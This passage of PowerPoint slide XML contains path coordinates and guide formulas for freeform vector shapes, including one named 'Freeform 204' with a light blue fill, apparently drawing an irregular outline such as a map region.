                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="22"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36472" name="Freeform 204"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3090" y="1966"/>
                <a:ext cx="286" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 286"/>
                  <a:gd name="T1" fmla="*/ 17 h 189"/>
                  <a:gd name="T2" fmla="*/ 54 w 286"/>
                  <a:gd name="T3" fmla="*/ 12 h 189"/>
                  <a:gd name="T4" fmla="*/ 77 w 286"/>
                  <a:gd name="T5" fmla="*/ 17 h 189"/>
                  <a:gd name="T6" fmla="*/ 88 w 286"/>
                  <a:gd name="T7" fmla="*/ 20 h 189"/>
                  <a:gd name="T8" fmla="*/ 96 w 286"/>
                  <a:gd name="T9" fmla="*/ 20 h 189"/>
                  <a:gd name="T10" fmla="*/ 105 w 286"/>
                  <a:gd name="T11" fmla="*/ 23 h 189"/>
                  <a:gd name="T12" fmla="*/ 114 w 286"/>
                  <a:gd name="T13" fmla="*/ 26 h 189"/>
                  <a:gd name="T14" fmla="*/ 127 w 286"/>
                  <a:gd name="T15" fmla="*/ 24 h 189"/>
                  <a:gd name="T16" fmla="*/ 132 w 286"/>
                  <a:gd name="T17" fmla="*/ 22 h 189"/>
                  <a:gd name="T18" fmla="*/ 143 w 286"/>
                  <a:gd name="T19" fmla="*/ 9 h 189"/>
                  <a:gd name="T20" fmla="*/ 163 w 286"/>
                  <a:gd name="T21" fmla="*/ 3 h 189"/>
                  <a:gd name="T22" fmla="*/ 188 w 286"/>
                  <a:gd name="T23" fmla="*/ 5 h 189"/>
                  <a:gd name="T24" fmla="*/ 191 w 286"/>
                  <a:gd name="T25" fmla="*/ 22 h 189"/>
                  <a:gd name="T26" fmla="*/ 209 w 286"/>
                  <a:gd name="T27" fmla="*/ 34 h 189"/>
                  <a:gd name="T28" fmla="*/ 217 w 286"/>
                  <a:gd name="T29" fmla="*/ 50 h 189"/>
                  <a:gd name="T30" fmla="*/ 234 w 286"/>
                  <a:gd name="T31" fmla="*/ 52 h 189"/>
                  <a:gd name="T32" fmla="*/ 247 w 286"/>
                  <a:gd name="T33" fmla="*/ 59 h 189"/>
                  <a:gd name="T34" fmla="*/ 262 w 286"/>
                  <a:gd name="T35" fmla="*/ 62 h 189"/>
                  <a:gd name="T36" fmla="*/ 280 w 286"/>
                  <a:gd name="T37" fmla="*/ 71 h 189"/>
                  <a:gd name="T38" fmla="*/ 286 w 286"/>
                  <a:gd name="T39" fmla="*/ 77 h 189"/>
                  <a:gd name="T40" fmla="*/ 284 w 286"/>
                  <a:gd name="T41" fmla="*/ 88 h 189"/>
                  <a:gd name="T42" fmla="*/ 281 w 286"/>
                  <a:gd name="T43" fmla="*/ 97 h 189"/>
                  <a:gd name="T44" fmla="*/ 272 w 286"/>
                  <a:gd name="T45" fmla="*/ 112 h 189"/>
                  <a:gd name="T46" fmla="*/ 256 w 286"/>
                  <a:gd name="T47" fmla="*/ 124 h 189"/>
                  <a:gd name="T48" fmla="*/ 226 w 286"/>
                  <a:gd name="T49" fmla="*/ 137 h 189"/>
                  <a:gd name="T50" fmla="*/ 196 w 286"/>
                  <a:gd name="T51" fmla="*/ 149 h 189"/>
                  <a:gd name="T52" fmla="*/ 209 w 286"/>
                  <a:gd name="T53" fmla="*/ 171 h 189"/>
                  <a:gd name="T54" fmla="*/ 220 w 286"/>
                  <a:gd name="T55" fmla="*/ 177 h 189"/>
                  <a:gd name="T56" fmla="*/ 189 w 286"/>
                  <a:gd name="T57" fmla="*/ 189 h 189"/>
                  <a:gd name="T58" fmla="*/ 167 w 286"/>
                  <a:gd name="T59" fmla="*/ 169 h 189"/>
                  <a:gd name="T60" fmla="*/ 178 w 286"/>
                  <a:gd name="T61" fmla="*/ 151 h 189"/>
                  <a:gd name="T62" fmla="*/ 153 w 286"/>
                  <a:gd name="T63" fmla="*/ 139 h 189"/>
                  <a:gd name="T64" fmla="*/ 117 w 286"/>
                  <a:gd name="T65" fmla="*/ 166 h 189"/>
                  <a:gd name="T66" fmla="*/ 98 w 286"/>
                  <a:gd name="T67" fmla="*/ 170 h 189"/>
                  <a:gd name="T68" fmla="*/ 101 w 286"/>
                  <a:gd name="T69" fmla="*/ 165 h 189"/>
                  <a:gd name="T70" fmla="*/ 104 w 286"/>
                  <a:gd name="T71" fmla="*/ 160 h 189"/>
                  <a:gd name="T72" fmla="*/ 108 w 286"/>
                  <a:gd name="T73" fmla="*/ 153 h 189"/>
                  <a:gd name="T74" fmla="*/ 109 w 286"/>
                  <a:gd name="T75" fmla="*/ 144 h 189"/>
                  <a:gd name="T76" fmla="*/ 113 w 286"/>
                  <a:gd name="T77" fmla="*/ 145 h 189"/>
                  <a:gd name="T78" fmla="*/ 117 w 286"/>
                  <a:gd name="T79" fmla="*/ 146 h 189"/>
                  <a:gd name="T80" fmla="*/ 121 w 286"/>
                  <a:gd name="T81" fmla="*/ 147 h 189"/>
                  <a:gd name="T82" fmla="*/ 125 w 286"/>
                  <a:gd name="T83" fmla="*/ 146 h 189"/>
                  <a:gd name="T84" fmla="*/ 124 w 286"/>
                  <a:gd name="T85" fmla="*/ 139 h 189"/>
                  <a:gd name="T86" fmla="*/ 118 w 286"/>
                  <a:gd name="T87" fmla="*/ 132 h 189"/>
                  <a:gd name="T88" fmla="*/ 118 w 286"/>
                  <a:gd name="T89" fmla="*/ 125 h 189"/>
                  <a:gd name="T90" fmla="*/ 112 w 286"/>
                  <a:gd name="T91" fmla="*/ 122 h 189"/>
                  <a:gd name="T92" fmla="*/ 113 w 286"/>
                  <a:gd name="T93" fmla="*/ 112 h 189"/>
                  <a:gd name="T94" fmla="*/ 106 w 286"/>
                  <a:gd name="T95" fmla="*/ 108 h 189"/>
                  <a:gd name="T96" fmla="*/ 99 w 286"/>
                  <a:gd name="T97" fmla="*/ 105 h 189"/>
                  <a:gd name="T98" fmla="*/ 95 w 286"/>
                  <a:gd name="T99" fmla="*/ 104 h 189"/>
                  <a:gd name="T100" fmla="*/ 89 w 286"/>
                  <a:gd name="T101" fmla="*/ 98 h 189"/>
                  <a:gd name="T102" fmla="*/ 82 w 286"/>
                  <a:gd name="T103" fmla="*/ 99 h 189"/>
                  <a:gd name="T104" fmla="*/ 73 w 286"/>
                  <a:gd name="T105" fmla="*/ 101 h 189"/>
                  <a:gd name="T106" fmla="*/ 48 w 286"/>
                  <a:gd name="T107" fmla="*/ 113 h 189"/>
                  <a:gd name="T108" fmla="*/ 23 w 286"/>
                  <a:gd name="T109" fmla="*/ 108 h 189"/>
                  <a:gd name="T110" fmla="*/ 7 w 286"/>
                  <a:gd name="T111" fmla="*/ 83 h 189"/>
                  <a:gd name="T112" fmla="*/ 30 w 286"/>
                  <a:gd name="T113" fmla="*/ 50 h 189"/>
                  <a:gd name="T114" fmla="*/ 25 w 286"/>
                  <a:gd name="T115" fmla="*/ 24 h 189"/>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286"/>
                  <a:gd name="T175" fmla="*/ 0 h 189"/>
                  <a:gd name="T176" fmla="*/ 286 w 286"/>
                  <a:gd name="T177" fmla="*/ 189 h 189"/>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286" h="189">
                    <a:moveTo>
                      <a:pt x="23" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="50"/>
                    </a:lnTo>
